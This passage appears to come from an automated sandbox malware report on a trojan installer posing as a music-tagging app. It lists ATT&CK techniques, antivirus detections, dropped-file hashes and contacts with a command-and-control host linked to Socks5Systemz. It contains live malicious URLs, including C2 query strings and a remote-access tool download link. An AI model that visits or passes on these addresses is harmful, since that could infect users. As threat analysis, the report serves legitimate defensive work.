        Discovery: 1 System Time Discovery; 1 Account Discovery; 3 File and Directory Discovery; 35 System Information Discovery; 41 Security Software Discovery; 21 Virtualization/Sandbox Evasion; 11 Application Window Discovery; 3 System Owner/User Discovery; 1 Remote System Discovery; 1 System Network Configuration Discovery
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot
        Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
        Command and Control: 2 Ingress Tool Transfer; 2 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 12 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol
        Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement
        Source | Detection | Scanner | Label
        file.exe | 8% | Virustotal |
        file.exe | 100% | Avira | HEUR/AGEN.1332570

        Source | Detection | Scanner
        C:\ProgramData\WWAN_MobileFixup 2.33.197.66\WWAN_MobileFixup 2.33.197.66.exe | 100% | Joe Sandbox ML
        C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe | 100% | Joe Sandbox ML
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-7CP2O.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-JTEEN.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-OSHRA.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\is-QO8P8.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libbz2-1.dll (copy) | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libgcc_s_dw2-1.dll (copy) | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libogg-0.dll (copy) | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libvorbis-0.dll (copy) | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Metatogger Music Collection\libwinpthread-1.dll (copy) | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_RegDLL.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_iscrypt.dll | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_isdecmp.dll | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
        C:\Users\user\AppData\Local\Temp\is-N32CN.tmp\_isetup\_shfoldr.dll | 0% | ReversingLabs
        No Antivirus matches
        No Antivirus matches

        Source | Detection | Scanner | Label
        http://www.remobjects.com/psU | 0% | URL Reputation | safe
        http://www.remobjects.com/psU | 0% | URL Reputation | safe
        http://www.remobjects.com/ps | 0% | URL Reputation | safe
        http://www.innosetup.com/ | 0% | Avira URL Cloud | safe
        http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14 | 0% | Avira URL Cloud | safe
        http://45.142.214.240/ | 0% | Avira URL Cloud | safe
        http://vovsoft.com | 0% | Avira URL Cloud | safe
        https://vovsoft.com/newsletter/ | 0% | Avira URL Cloud | safe
        http://www.openssl.org). | 0% | Avira URL Cloud | safe
        https://vovsoft.com/contact/. | 0% | Avira URL Cloud | safe
        http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e99586 | 0% | Avira URL Cloud | safe
        http://www.innosetup.com/ | 1% | Virustotal |
        http://vovsoft.com | 0% | Virustotal |
        http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339 | 0% | Avira URL Cloud | safe
        https://vovsoft.com/contact/ | 0% | Avira URL Cloud | safe
        https://vovsoft.com/contact/. | 0% | Virustotal |
        http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df | 0% | Avira URL Cloud | safe
        https://vovsoft.com/newsletter/ | 0% | Virustotal |
        https://vovsoft.com/contact/ | 0% | Virustotal |
        http://45.142.214.240/ | 8% | Virustotal |
        NameIPActiveMaliciousAntivirus DetectionReputation
        csoodgx.net
        45.142.214.240
        truetrue
          unknown
          NameMaliciousAntivirus DetectionReputation
          http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e9958648875a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee949d3acd6a9f14true
          • Avira URL Cloud: safe
          unknown
          http://csoodgx.net/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ffe16c1ef909339true
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.innosetup.com/file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drfalse
          • 1%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://45.142.214.240/metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmpfalse
          • 8%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://www.remobjects.com/psUfile.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.drfalse
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://vovsoft.comfile.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          https://vovsoft.com/newsletter/file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
          • 0%, Virustotal, Browse
          • Avira URL Cloud: safe
          unknown
          http://mingw-w64.sourceforge.net/Xis-QO8P8.tmp.1.drfalse
            high
            http://www.openssl.org).file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007CF000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            low
            https://vovsoft.com/contact/.file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
URL:http://www.remobjects.com/ps
Source:file.exe, 00000000.00000003.1970235248.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1970371645.0000000002138000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-B2M6R.tmp.1.dr, file.tmp.0.dr
Malicious:false
Antivirus:
• URL Reputation: safe
Reputation:unknown
URL:http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e99586
Source:metatoggermusiccollection.exe, 00000004.00000002.3216869641.0000000003390000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3216976399.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000832000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Antivirus:
• Avira URL Cloud: safe
Reputation:unknown
URL:https://vovsoft.com/contact/
Source:file.exe, 00000000.00000002.3215755400.0000000002130000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969680734.0000000002124000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.1969610564.0000000002360000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974505998.0000000003110000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3215818794.00000000007AD000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1974597518.00000000021EC000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.1978169120.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.3216082455.00000000021F8000.00000004.00001000.00020000.00000000.sdmp
Malicious:false
Antivirus:
• 0%, Virustotal
• Avira URL Cloud: safe
Reputation:unknown
URL:http://45.142.214.240/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df
Source:metatoggermusiccollection.exe, 00000004.00000002.3215694991.0000000000871000.00000004.00000020.00020000.00000000.sdmp
Malicious:false
Antivirus:
• Avira URL Cloud: safe
Reputation:unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
45.142.214.240 | csoodgx.net | Russian Federation | 200019 | ALEXHOSTMD | true
89.105.201.183 | unknown | Netherlands | 24875 | NOVOSERVE-ASNL | false
            Joe Sandbox version:40.0.0 Tourmaline
            Analysis ID:1417474
            Start date and time:2024-03-29 12:08:05 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 5m 54s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes:7
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:file.exe
            Detection:MAL
            Classification:mal100.troj.evad.winEXE@7/27@1/2
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 92%
            • Number of executed functions: 201
            • Number of non-executed functions: 254
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
Time | Type | Description
12:09:25 | API Interceptor | 366347x Sleep call for process: metatoggermusiccollection.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
45.142.214.240 | qY7gbJZZEg.exe | malicious | Socks5Systemz
45.142.214.240 | 4sFJbsYtlZ.exe | malicious | Socks5Systemz
45.142.214.240 | JkzAVzO10i.exe | malicious | Socks5Systemz
45.142.214.240 | 30BoW8L6li.exe | malicious | Socks5Systemz
45.142.214.240 | TLjPBsFGBA.exe | malicious | Socks5Systemz
45.142.214.240 | TsJIjW3BGG.exe | malicious | Socks5Systemz
45.142.214.240 | TmL1QoijLY.exe | malicious | Socks5Systemz
45.142.214.240 | MdDTnpwLpW.exe | malicious | Socks5Systemz
45.142.214.240 | Ht3cChAW7m.exe | malicious | Socks5Systemz
45.142.214.240 | qI6GAdt66c.exe | malicious | Socks5Systemz
89.105.201.183 | SecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exe | malicious | Glupteba, Mars Stealer, Socks5Systemz, Stealc, Vidar
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ALEXHOSTMD | https://airdrop-online-altlayer-anniversary.s3.us-east-2.amazonaws.com/posten.html?cid=freetomfr@hotmail.com | malicious | Phisher | 176.123.0.55
ALEXHOSTMD | Mcb5K3TOWT.exe | malicious | Unknown | 176.123.3.222
ALEXHOSTMD | https://zoneimport.g3639.gleeze.com:8443/Bin/ScreenConnect.WindowsBackstageShell.exe | malicious | Unknown | 176.123.10.70
ALEXHOSTMD | https://zoneimport.g3639.gleeze.com:8443/Bin/support.Client.exe?h=zoneimport.g3639.gleeze.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQC9E418YcI0GPCt6nL8JLXCrMVf52TCL6876nxAnRhTrORKZpQBP%2FOOMq8NyfwADFO5Cd84vRpMcQXSF3WH9nDCENT7s9bnfsiMfr4yv2tN2F2pLViDwga%2FKmuJQ4nHCHKP3ZiHxALI%2FiYFsUB3U7Kh29d9UfQXfO7h7RT3qvsSgosh64UPscMDajPw31sWFKkqxCX6dxsugjZn2HG3HyKdxKwdMqtEMkric02HfEdRRYE4tgBiOoxJ6Qqe%2F3Y6QGqI3ll8CZCAoPErr6Nyf%2F0mXkzkoUzaEZZ2ybUwNOgyikyAdK5HCgvcTJX%2BO4XTPvCcRTaQ8kadfT5nmEpZD7OS&s=8ca74fb1-50aa-4e0c-8369-bef89caa9168&i=Untitled%20Session&e=Support&y=Guest&r= | malicious | ScreenConnect Tool | 176.123.10.70
ALEXHOSTMD | qY7gbJZZEg.exe | malicious | Socks5Systemz | 45.142.214.240
ALEXHOSTMD | 4sFJbsYtlZ.exe | malicious | Socks5Systemz | 45.142.214.240
ALEXHOSTMD | JkzAVzO10i.exe | malicious | Socks5Systemz | 45.142.214.240
ALEXHOSTMD | 30BoW8L6li.exe | malicious | Socks5Systemz | 45.142.214.240
ALEXHOSTMD | TLjPBsFGBA.exe | malicious | Socks5Systemz | 45.142.214.240
ALEXHOSTMD | TsJIjW3BGG.exe | malicious | Socks5Systemz | 45.142.214.240
NOVOSERVE-ASNL | SecuriteInfo.com.Trojan.PackedNET.2742.9443.15673.exe | malicious | Glupteba, Mars Stealer, Socks5Systemz, Stealc, Vidar | 89.105.201.183
NOVOSERVE-ASNL | https://zoom-download.pics | malicious | Unknown | 89.105.201.222
NOVOSERVE-ASNL | sora.arm.elf | malicious | Mirai | 80.89.243.97
NOVOSERVE-ASNL | tyF5uZFTm6.elf | malicious | Mirai | 80.89.243.91
NOVOSERVE-ASNL | XUIn1BoRmN.elf | malicious | Mirai | 80.89.243.99
NOVOSERVE-ASNL | IEEi5d6RYU | malicious | Mirai | 80.89.243.93
NOVOSERVE-ASNL | home.x86_64 | malicious | Mirai | 80.89.243.98
NOVOSERVE-ASNL | home.mips-20220723-2320 | malicious | Gafgyt, Mirai | 80.89.243.94
NOVOSERVE-ASNL | mips-20220704-2102 | malicious | Mirai | 80.89.243.93
NOVOSERVE-ASNL | jzeufDzhs4 | malicious | Mirai | 80.89.243.92
                                  No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | i1crvbOZAP.exe | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | qY7gbJZZEg.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | 4sFJbsYtlZ.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | JkzAVzO10i.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | 30BoW8L6li.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | TLjPBsFGBA.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | TsJIjW3BGG.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | TmL1QoijLY.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | MdDTnpwLpW.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-6VPG9.tmp | Ht3cChAW7m.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | i1crvbOZAP.exe | malicious | Amadey, Glupteba, Mars Stealer, PureLog Stealer, RedLine, RisePro Stealer, SmokeLoader
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | qY7gbJZZEg.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | 4sFJbsYtlZ.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | JkzAVzO10i.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | 30BoW8L6li.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | TLjPBsFGBA.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | TsJIjW3BGG.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | TmL1QoijLY.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | MdDTnpwLpW.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\Metatogger Music Collection\is-2EOVT.tmp | Ht3cChAW7m.exe | malicious | Socks5Systemz
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1853204
                                                                          Entropy (8bit):7.097039022655032
                                                                          Encrypted:false
                                                                          SSDEEP:24576:MpHpU1XpkfxgVpDRpGTpbi8p/Qup0dwJewzk+xfergEEMo947gNSqeB8xivxB1Lt:MR2pUxgV1RwT/xQu6dw0wQ+xY9VF72A
                                                                          MD5:CC6DE23FFDBD2BC10F9CFD9E44659A2D
                                                                          SHA1:418C982C63DA06773421F92266BADA86761701EB
                                                                          SHA-256:B7DFAAFB460D5AB8F2F0CE0FA5F12833EAAF20AAE9A9919A5EB83743EAF4FE1A
                                                                          SHA-512:9DAC3574E65E2F172620FBAA591E464C1331479480F2F5A25ABE6FFE52A9A8544222D219E84E8C72F4334B2D18053B62DA76C8EFAE2A3F5A45CC95D9311EED8B
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          Reputation:low
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....G.^..........*...............................@..........................p..............................................L...x.......................................................................................l............................text............................... ..`.rdata...'.......0..................@..@.data...xU... ...@... ..............@....rsrc................`..............@..@_char2_......p.......P..............a...........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):4
                                                                          Entropy (8bit):0.8112781244591328
                                                                          Encrypted:false
                                                                          SSDEEP:3:E:E
                                                                          MD5:14791D7C7467A6BB2F140BCAF8B145F4
                                                                          SHA1:44127D404CAAB816C2DDB4644A9B9FA6BCCC429D
                                                                          SHA-256:4A11C2997424CD7A381ECA1948DD4C442CB4B2A8086B676ECF67EFF032EAACEC
                                                                          SHA-512:0E342BD795A6B44B88CFC8DC3EFCFCAB0F77C44C4BDF943E94C838FBC416FB26FAEFD2F0D6CC9FE86DAC39C251D35AEDF0B8EF87D7C1ACB88DF6032E2C674970
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:i...
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):2.9545817380615236
                                                                          Encrypted:false
                                                                          SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                          MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                          SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                          SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                          SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):128
                                                                          Entropy (8bit):1.2701231977328944
                                                                          Encrypted:false
                                                                          SSDEEP:3:WAmJuXDz8/:HHzc
                                                                          MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                          SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                          SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                          SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                          Malicious:false
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Metatogger Music Collection\metatoggermusiccollection.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):8
                                                                          Entropy (8bit):2.0
                                                                          Encrypted:false
                                                                          SSDEEP:3:8Dll/:85t
                                                                          MD5:499E1B783576DBE7AC7AAF790755C813
                                                                          SHA1:099C55F6EA301C88E0FA803E40BD99FF953E2D06
                                                                          SHA-256:57B2FF1FB01C3647CFE413DF6539ADD7F9E663BC6687324011DD6195FC744534
                                                                          SHA-512:B34B93000C0041126F793497D1BA2CBD697FD9980E97D7C2A6F7AB458BADD6EB95F79DE17AB13ECCEDBB41D82C6449EE6E29ED4B58ED7ADAF9A540C107C6D8AA
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:...f....
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):105784
                                                                          Entropy (8bit):6.258144336244945
                                                                          Encrypted:false
                                                                          SSDEEP:1536:2VpMEh4vFu4sry2jkEw0D2cXTY+sgmX18CGLganGc:2Vai3yjEw0DNX03gmqCOD3
                                                                          MD5:0C6452935851B7CDB3A365AECD2DD260
                                                                          SHA1:83EF3CD7F985ACC113A6DE364BDB376DBF8D2F48
                                                                          SHA-256:F8385D08BD44B213FF2A2C360FE01AE8A1EDA5311C7E1FC1A043C524E899A8ED
                                                                          SHA-512:5FF21A85EE28665C4E707C7044F122D1BAC8E408A06F8EA16E33A8C9201798D196FA65B24327F208C4FF415E24A5AD2414FE7A91D9C0B0D8CFF88299111F2E1D
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
• Filename: i1crvbOZAP.exe, Detection: malicious
• Filename: qY7gbJZZEg.exe, Detection: malicious
• Filename: 4sFJbsYtlZ.exe, Detection: malicious
• Filename: JkzAVzO10i.exe, Detection: malicious
• Filename: 30BoW8L6li.exe, Detection: malicious
• Filename: TLjPBsFGBA.exe, Detection: malicious
• Filename: TsJIjW3BGG.exe, Detection: malicious
• Filename: TmL1QoijLY.exe, Detection: malicious
• Filename: MdDTnpwLpW.exe, Detection: malicious
• Filename: Ht3cChAW7m.exe, Detection: malicious
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...........@......#...#.2...................P.....b......................................@... .................................................................@............................k......................<................................text...d0.......2..................`.P`.data...l....P.......6..............@.`..rdata..L....`.......D..............@.`@/4....... ......."...\..............@.0@.bss....P.............................`..edata...............~..............@.0@.idata..............................@.0..CRT....,...........................@.0..tls................................@.0..reloc..@...........................@.0B................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\AppData\Local\Temp\is-4BCG1.tmp\file.tmp
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):125637
                                                                          Entropy (8bit):6.2640431186303145
                                                                          Encrypted:false
                                                                          SSDEEP:3072:lRvT0WUWJXNEn9bufmWAHE9pQIAOBmuWR2:DT0WU6E9Kfms9p5guWc
                                                                          MD5:6231B452E676ADE27CA0CEB3A3CF874A
                                                                          SHA1:F8236DBF9FA3B2835BBB5A8D08DAB3A155F310D1
                                                                          SHA-256:9941EEE1CAFFFAD854AB2DFD49BF6E57B181EFEB4E2D731BA7A28F5AB27E91CF
                                                                          SHA-512:F5882A3CDED0A4E498519DE5679EA12A0EA275C220E318AF1762855A94BDAC8DC5413D1C5D1A55A7CC31CFEBCF4647DCF1F653195536CE1826A3002CF01AA12C
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
• Filename: i1crvbOZAP.exe, Detection: malicious
